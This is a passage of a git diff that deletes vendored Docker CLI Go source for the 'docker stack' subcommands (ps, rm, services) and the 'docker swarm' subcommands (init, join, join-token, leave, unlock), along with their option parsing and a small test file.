-) ([]*stack, error) {
-	services, err := apiclient.ServiceList(
-		ctx,
-		types.ServiceListOptions{Filters: getAllStacksFilter()})
-	if err != nil {
-		return nil, err
-	}
-	m := make(map[string]*stack, 0)
-	for _, service := range services {
-		labels := service.Spec.Labels
-		name, ok := labels[convert.LabelNamespace]
-		if !ok {
-			return nil, fmt.Errorf("cannot get label %s for service %s",
-				convert.LabelNamespace, service.ID)
-		}
-		ztack, ok := m[name]
-		if !ok {
-			m[name] = &stack{
-				Name:     name,
-				Services: 1,
-			}
-		} else {
-			ztack.Services++
-		}
-	}
-	var stacks []*stack
-	for _, stack := range m {
-		stacks = append(stacks, stack)
-	}
-	return stacks, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go
deleted file mode 100644
index 74fe4f5343..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/opts.go
+++ /dev/null
@@ -1,49 +0,0 @@
-package stack
-
-import (
-	"fmt"
-	"io"
-	"os"
-
-	"github.com/docker/docker/cli/command/bundlefile"
-	"github.com/spf13/pflag"
-)
-
-func addComposefileFlag(opt *string, flags *pflag.FlagSet) {
-	flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file")
-}
-
-func addBundlefileFlag(opt *string, flags *pflag.FlagSet) {
-	flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file")
-	flags.SetAnnotation("bundle-file", "experimental", nil)
-}
-
-func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) {
-	flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents")
-}
-
-func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) {
-	defaultPath := fmt.Sprintf("%s.dab", namespace)
-
-	if path == "" {
-		path = defaultPath
-	}
-	if _, err := os.Stat(path); err != nil {
-		return nil, fmt.Errorf(
-			"Bundle %s not found. Specify the path with --file",
-			path)
-	}
-
-	fmt.Fprintf(stderr, "Loading bundle from %s\n", path)
-	reader, err := os.Open(path)
-	if err != nil {
-		return nil, err
-	}
-	defer reader.Close()
-
-	bundle, err := bundlefile.LoadFile(reader)
-	if err != nil {
-		return nil, fmt.Errorf("Error reading %s: %v\n", path, err)
-	}
-	return bundle, err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go
deleted file mode 100644
index e4351bfc7c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/ps.go
+++ /dev/null
@@ -1,61 +0,0 @@
-package stack
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/idresolver"
-	"github.com/docker/docker/cli/command/task"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type psOptions struct {
-	filter    opts.FilterOpt
-	noTrunc   bool
-	namespace string
-	noResolve bool
-}
-
-func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := psOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "ps [OPTIONS] STACK",
-		Short: "List the tasks in the stack",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.namespace = args[0]
-			return runPS(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
-	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runPS(dockerCli *command.DockerCli, opts psOptions) error {
-	namespace := opts.namespace
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	filter := getStackFilterFromOpt(opts.namespace, opts.filter)
-	tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
-	if err != nil {
-		return err
-	}
-
-	if len(tasks) == 0 {
-		fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace)
-		return nil
-	}
-
-	return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go
deleted file mode 100644
index 966c1aa6bf..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/remove.go
+++ /dev/null
@@ -1,112 +0,0 @@
-package stack
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type removeOptions struct {
-	namespace string
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts removeOptions
-
-	cmd := &cobra.Command{
-		Use:     "rm STACK",
-		Aliases: []string{"remove", "down"},
-		Short:   "Remove the stack",
-		Args:    cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.namespace = args[0]
-			return runRemove(dockerCli, opts)
-		},
-	}
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, opts removeOptions) error {
-	namespace := opts.namespace
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	services, err := getServices(ctx, client, namespace)
-	if err != nil {
-		return err
-	}
-
-	networks, err := getStackNetworks(ctx, client, namespace)
-	if err != nil {
-		return err
-	}
-
-	secrets, err := getStackSecrets(ctx, client, namespace)
-	if err != nil {
-		return err
-	}
-
-	if len(services)+len(networks)+len(secrets) == 0 {
-		fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace)
-		return nil
-	}
-
-	hasError := removeServices(ctx, dockerCli, services)
-	hasError = removeSecrets(ctx, dockerCli, secrets) || hasError
-	hasError = removeNetworks(ctx, dockerCli, networks) || hasError
-
-	if hasError {
-		return fmt.Errorf("Failed to remove some resources")
-	}
-	return nil
-}
-
-func removeServices(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	services []swarm.Service,
-) bool {
-	var err error
-	for _, service := range services {
-		fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name)
-		if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err)
-		}
-	}
-	return err != nil
-}
-
-func removeNetworks(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	networks []types.NetworkResource,
-) bool {
-	var err error
-	for _, network := range networks {
-		fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name)
-		if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err)
-		}
-	}
-	return err != nil
-}
-
-func removeSecrets(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	secrets []swarm.Secret,
-) bool {
-	var err error
-	for _, secret := range secrets {
-		fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name)
-		if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err)
-		}
-	}
-	return err != nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go
deleted file mode 100644
index a46652df7c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/services.go
+++ /dev/null
@@ -1,79 +0,0 @@
-package stack
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/service"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type servicesOptions struct {
-	quiet     bool
-	filter    opts.FilterOpt
-	namespace string
-}
-
-func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := servicesOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "services [OPTIONS] STACK",
-		Short: "List the services in the stack",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.namespace = args[0]
-			return runServices(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runServices(dockerCli *command.DockerCli, opts servicesOptions) error {
-	ctx := context.Background()
-	client := dockerCli.Client()
-
-	filter := getStackFilterFromOpt(opts.namespace, opts.filter)
-	services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter})
-	if err != nil {
-		return err
-	}
-
-	out := dockerCli.Out()
-
-	// if no services in this stack, print message and exit 0
-	if len(services) == 0 {
-		fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace)
-		return nil
-	}
-
-	if opts.quiet {
-		service.PrintQuiet(out, services)
-	} else {
-		taskFilter := filters.NewArgs()
-		for _, service := range services {
-			taskFilter.Add("service", service.ID)
-		}
-
-		tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter})
-		if err != nil {
-			return err
-		}
-		nodes, err := client.NodeList(ctx, types.NodeListOptions{})
-		if err != nil {
-			return err
-		}
-		service.PrintNotQuiet(out, services, nodes, tasks)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go
deleted file mode 100644
index 632679c4b6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go
+++ /dev/null
@@ -1,28 +0,0 @@
-package swarm
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewSwarmCommand returns a cobra command for `swarm` subcommands
-func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "swarm",
-		Short: "Manage Swarm",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newInitCommand(dockerCli),
-		newJoinCommand(dockerCli),
-		newJoinTokenCommand(dockerCli),
-		newUnlockKeyCommand(dockerCli),
-		newUpdateCommand(dockerCli),
-		newLeaveCommand(dockerCli),
-		newUnlockCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go
deleted file mode 100644
index 2550feeb47..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/init.go
+++ /dev/null
@@ -1,85 +0,0 @@
-package swarm
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/pkg/errors"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-type initOptions struct {
-	swarmOptions
-	listenAddr NodeAddrOption
-	// Not a NodeAddrOption because it has no default port.
-	advertiseAddr   string
-	forceNewCluster bool
-}
-
-func newInitCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := initOptions{
-		listenAddr: NewListenAddrOption(),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "init [OPTIONS]",
-		Short: "Initialize a swarm",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runInit(dockerCli, cmd.Flags(), opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: <ip|interface>[:port])")
-	flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: <ip|interface>[:port])")
-	flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state")
-	flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)")
-	addSwarmFlags(flags, &opts.swarmOptions)
-	return cmd
-}
-
-func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	req := swarm.InitRequest{
-		ListenAddr:       opts.listenAddr.String(),
-		AdvertiseAddr:    opts.advertiseAddr,
-		ForceNewCluster:  opts.forceNewCluster,
-		Spec:             opts.swarmOptions.ToSpec(flags),
-		AutoLockManagers: opts.swarmOptions.autolock,
-	}
-
-	nodeID, err := client.SwarmInit(ctx, req)
-	if err != nil {
-		if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") {
-			return errors.New(err.Error() + " - specify one with --advertise-addr")
-		}
-		return err
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID)
-
-	if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil {
-		return err
-	}
-
-	fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n")
-
-	if req.AutoLockManagers {
-		unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
-		if err != nil {
-			return errors.Wrap(err, "could not fetch unlock key")
-		}
-		printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go
deleted file mode 100644
index 004313b4c6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/join.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package swarm
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type joinOptions struct {
-	remote     string
-	listenAddr NodeAddrOption
-	// Not a NodeAddrOption because it has no default port.
-	advertiseAddr string
-	token         string
-}
-
-func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := joinOptions{
-		listenAddr: NewListenAddrOption(),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "join [OPTIONS] HOST:PORT",
-		Short: "Join a swarm as a node and/or manager",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.remote = args[0]
-			return runJoin(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: <ip|interface>[:port])")
-	flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: <ip|interface>[:port])")
-	flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm")
-	return cmd
-}
-
-func runJoin(dockerCli *command.DockerCli, opts joinOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	req := swarm.JoinRequest{
-		JoinToken:     opts.token,
-		ListenAddr:    opts.listenAddr.String(),
-		AdvertiseAddr: opts.advertiseAddr,
-		RemoteAddrs:   []string{opts.remote},
-	}
-	err := client.SwarmJoin(ctx, req)
-	if err != nil {
-		return err
-	}
-
-	info, err := client.Info(ctx)
-	if err != nil {
-		return err
-	}
-
-	if info.Swarm.ControlAvailable {
-		fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.")
-	} else {
-		fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.")
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go
deleted file mode 100644
index 3a17a8020f..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go
+++ /dev/null
@@ -1,105 +0,0 @@
-package swarm
-
-import (
-	"errors"
-	"fmt"
-
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"golang.org/x/net/context"
-)
-
-func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var rotate, quiet bool
-
-	cmd := &cobra.Command{
-		Use:   "join-token [OPTIONS] (worker|manager)",
-		Short: "Manage join tokens",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			worker := args[0] == "worker"
-			manager := args[0] == "manager"
-
-			if !worker && !manager {
-				return errors.New("unknown role " + args[0])
-			}
-
-			client := dockerCli.Client()
-			ctx := context.Background()
-
-			if rotate {
-				var flags swarm.UpdateFlags
-
-				swarm, err := client.SwarmInspect(ctx)
-				if err != nil {
-					return err
-				}
-
-				flags.RotateWorkerToken = worker
-				flags.RotateManagerToken = manager
-
-				err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags)
-				if err != nil {
-					return err
-				}
-				if !quiet {
-					fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0])
-				}
-			}
-
-			swarm, err := client.SwarmInspect(ctx)
-			if err != nil {
-				return err
-			}
-
-			if quiet {
-				if worker {
-					fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker)
-				} else {
-					fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager)
-				}
-			} else {
-				info, err := client.Info(ctx)
-				if err != nil {
-					return err
-				}
-				return printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager)
-			}
-			return nil
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVar(&rotate, flagRotate, false, "Rotate join token")
-	flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token")
-
-	return cmd
-}
-
-func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error {
-	client := dockerCli.Client()
-
-	swarm, err := client.SwarmInspect(ctx)
-	if err != nil {
-		return err
-	}
-
-	node, _, err := client.NodeInspectWithRaw(ctx, nodeID)
-	if err != nil {
-		return err
-	}
-
-	if node.ManagerStatus != nil {
-		if worker {
-			fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n    docker swarm join \\\n    --token %s \\\n    %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr)
-		}
-		if manager {
-			fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n    docker swarm join \\\n    --token %s \\\n    %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr)
-		}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go
deleted file mode 100644
index e2cfa0a045..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/leave.go
+++ /dev/null
@@ -1,44 +0,0 @@
-package swarm
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type leaveOptions struct {
-	force bool
-}
-
-func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := leaveOptions{}
-
-	cmd := &cobra.Command{
-		Use:   "leave [OPTIONS]",
-		Short: "Leave the swarm",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runLeave(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, ignoring warnings")
-	return cmd
-}
-
-func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	if err := client.SwarmLeave(ctx, opts.force); err != nil {
-		return err
-	}
-
-	fmt.Fprintln(dockerCli.Out(), "Node left the swarm.")
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go
deleted file mode 100644
index 9db46dcf55..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/opts.go
+++ /dev/null
@@ -1,209 +0,0 @@
-package swarm
-
-import (
-	"encoding/csv"
-	"errors"
-	"fmt"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/pflag"
-)
-
-const (
-	defaultListenAddr = "0.0.0.0:2377"
-
-	flagCertExpiry          = "cert-expiry"
-	flagDispatcherHeartbeat = "dispatcher-heartbeat"
-	flagListenAddr          = "listen-addr"
-	flagAdvertiseAddr       = "advertise-addr"
-	flagQuiet               = "quiet"
-	flagRotate              = "rotate"
-	flagToken               = "token"
-	flagTaskHistoryLimit    = "task-history-limit"
-	flagExternalCA          = "external-ca"
-	flagMaxSnapshots        = "max-snapshots"
-	flagSnapshotInterval    = "snapshot-interval"
-	flagLockKey             = "lock-key"
-	flagAutolock            = "autolock"
-)
-
-type swarmOptions struct {
-	taskHistoryLimit    int64
-	dispatcherHeartbeat time.Duration
-	nodeCertExpiry      time.Duration
-	externalCA          ExternalCAOption
-	maxSnapshots        uint64
-	snapshotInterval    uint64
-	autolock            bool
-}
-
-// NodeAddrOption is a pflag.Value for listening addresses
-type NodeAddrOption struct {
-	addr string
-}
-
-// String prints the representation of this flag
-func (a *NodeAddrOption) String() string {
-	return a.Value()
-}
-
-// Set the value for this flag
-func (a *NodeAddrOption) Set(value string) error {
-	addr, err := opts.ParseTCPAddr(value, a.addr)
-	if err != nil {
-		return err
-	}
-	a.addr = addr
-	return nil
-}
-
-// Type returns the type of this flag
-func (a *NodeAddrOption) Type() string {
-	return "node-addr"
-}
-
-// Value returns the value of this option as addr:port
-func (a *NodeAddrOption) Value() string {
-	return strings.TrimPrefix(a.addr, "tcp://")
-}
-
-// NewNodeAddrOption returns a new node address option
-func NewNodeAddrOption(addr string) NodeAddrOption {
-	return NodeAddrOption{addr}
-}
-
-// NewListenAddrOption returns a NodeAddrOption with default values
-func NewListenAddrOption() NodeAddrOption {
-	return NewNodeAddrOption(defaultListenAddr)
-}
-
-// ExternalCAOption is a Value type for parsing external CA specifications.
-type ExternalCAOption struct {
-	values []*swarm.ExternalCA
-}
-
-// Set parses an external CA option.
-func (m *ExternalCAOption) Set(value string) error {
-	parsed, err := parseExternalCA(value)
-	if err != nil {
-		return err
-	}
-
-	m.values = append(m.values, parsed)
-	return nil
-}
-
-// Type returns the type of this option.
-func (m *ExternalCAOption) Type() string {
-	return "external-ca"
-}
-
-// String returns a string repr of this option.
-func (m *ExternalCAOption) String() string {
-	externalCAs := []string{}
-	for _, externalCA := range m.values {
-		repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL)
-		externalCAs = append(externalCAs, repr)
-	}
-	return strings.Join(externalCAs, ", ")
-}
-
-// Value returns the external CAs
-func (m *ExternalCAOption) Value() []*swarm.ExternalCA {
-	return m.values
-}
-
-// parseExternalCA parses an external CA specification from the command line,
-// such as protocol=cfssl,url=https://example.com.
-func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) {
-	csvReader := csv.NewReader(strings.NewReader(caSpec))
-	fields, err := csvReader.Read()
-	if err != nil {
-		return nil, err
-	}
-
-	externalCA := swarm.ExternalCA{
-		Options: make(map[string]string),
-	}
-
-	var (
-		hasProtocol bool
-		hasURL      bool
-	)
-
-	for _, field := range fields {
-		parts := strings.SplitN(field, "=", 2)
-
-		if len(parts) != 2 {
-			return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field)
-		}
-
-		key, value := parts[0], parts[1]
-
-		switch strings.ToLower(key) {
-		case "protocol":
-			hasProtocol = true
-			if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) {
-				externalCA.Protocol = swarm.ExternalCAProtocolCFSSL
-			} else {
-				return nil, fmt.Errorf("unrecognized external CA protocol %s", value)
-			}
-		case "url":
-			hasURL = true
-			externalCA.URL = value
-		default:
-			externalCA.Options[key] = value
-		}
-	}
-
-	if !hasProtocol {
-		return nil, errors.New("the external-ca option needs a protocol= parameter")
-	}
-	if !hasURL {
-		return nil, errors.New("the external-ca option needs a url= parameter")
-	}
-
-	return &externalCA, nil
-}
-
-func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) {
-	flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit")
-	flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)")
-	flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)")
-	flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints")
-	flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain")
-	flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots")
-}
-
-func (opts *swarmOptions) mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) {
-	if flags.Changed(flagTaskHistoryLimit) {
-		spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit
-	}
-	if flags.Changed(flagDispatcherHeartbeat) {
-		spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat
-	}
-	if flags.Changed(flagCertExpiry) {
-		spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry
-	}
-	if flags.Changed(flagExternalCA) {
-		spec.CAConfig.ExternalCAs = opts.externalCA.Value()
-	}
-	if flags.Changed(flagMaxSnapshots) {
-		spec.Raft.KeepOldSnapshots = &opts.maxSnapshots
-	}
-	if flags.Changed(flagSnapshotInterval) {
-		spec.Raft.SnapshotInterval = opts.snapshotInterval
-	}
-	if flags.Changed(flagAutolock) {
-		spec.EncryptionConfig.AutoLockManagers = opts.autolock
-	}
-}
-
-func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec {
-	var spec swarm.Spec
-	opts.mergeSwarmSpec(&spec, flags)
-	return spec
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
deleted file mode 100644
index 568dc87302..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
+++ /dev/null
@@ -1,37 +0,0 @@
-package swarm
-
-import (
-	"testing"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestNodeAddrOptionSetHostAndPort(t *testing.T) {
-	opt := NewNodeAddrOption("old:123")
-	addr := "newhost:5555"
-	assert.NilError(t, opt.Set(addr))
-	assert.Equal(t, opt.Value(), addr)
-}
-
-func TestNodeAddrOptionSetHostOnly(t *testing.T) {
-	opt := NewListenAddrOption()
-	assert.NilError(t, opt.Set("newhost"))
-	assert.Equal(t, opt.Value(), "newhost:2377")
-}
-
-func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) {
-	opt := NewListenAddrOption()
-	assert.NilError(t, opt.Set("::1"))
-	assert.Equal(t, opt.Value(), "[::1]:2377")
-}
-
-func TestNodeAddrOptionSetPortOnly(t *testing.T) {
-	opt := NewListenAddrOption()
-	assert.NilError(t, opt.Set(":4545"))
-	assert.Equal(t, opt.Value(), "0.0.0.0:4545")
-}
-
-func TestNodeAddrOptionSetInvalidFormat(t *testing.T) {
-	opt := NewListenAddrOption()
-	assert.Error(t, opt.Set("http://localhost:4545"), "Invalid")
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go
deleted file mode 100644
index 048fb56e3d..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go
+++ /dev/null
@@ -1,54 +0,0 @@
-package swarm
-
-import (
-	"bufio"
-	"fmt"
-	"io"
-	"strings"
-
-	"github.com/spf13/cobra"
-	"golang.org/x/crypto/ssh/terminal"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"golang.org/x/net/context"
-)
-
-func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "unlock",
-		Short: "Unlock swarm",
-		Args:  cli.ExactArgs(0),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			client := dockerCli.Client()
-			ctx := context.Background()
-
-			key, err := readKey(dockerCli.In(), "Please enter unlock key: ")
-			if err != nil {
-				return err
-			}
-			req := swarm.UnlockRequest{
-				UnlockKey: key,
-			}
-
-			return client.SwarmUnlock(ctx, req)
-		},
-	}
-
-	return cmd
-}
-
-func readKey(in *command.InStream, prompt string) (string, error) {
-	if in.IsTerminal() {
-		fmt.Print(prompt)
-		dt, err := terminal.ReadPassword(int(in.FD()))
-		fmt.Println()
-		return string(dt), err
-	}
-	key, err := bufio.NewReader(in).ReadString('\n')
-	if err == io.EOF {
-		err = nil
-	}
-	return strings.TrimSpace(key), err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
deleted file mode 100644
index 96450f55b8..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
+++ /dev/null
@@ -1,79 +0,0 @@
-package swarm
-
-import (
-	"fmt"
-
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/api/types/swarm"
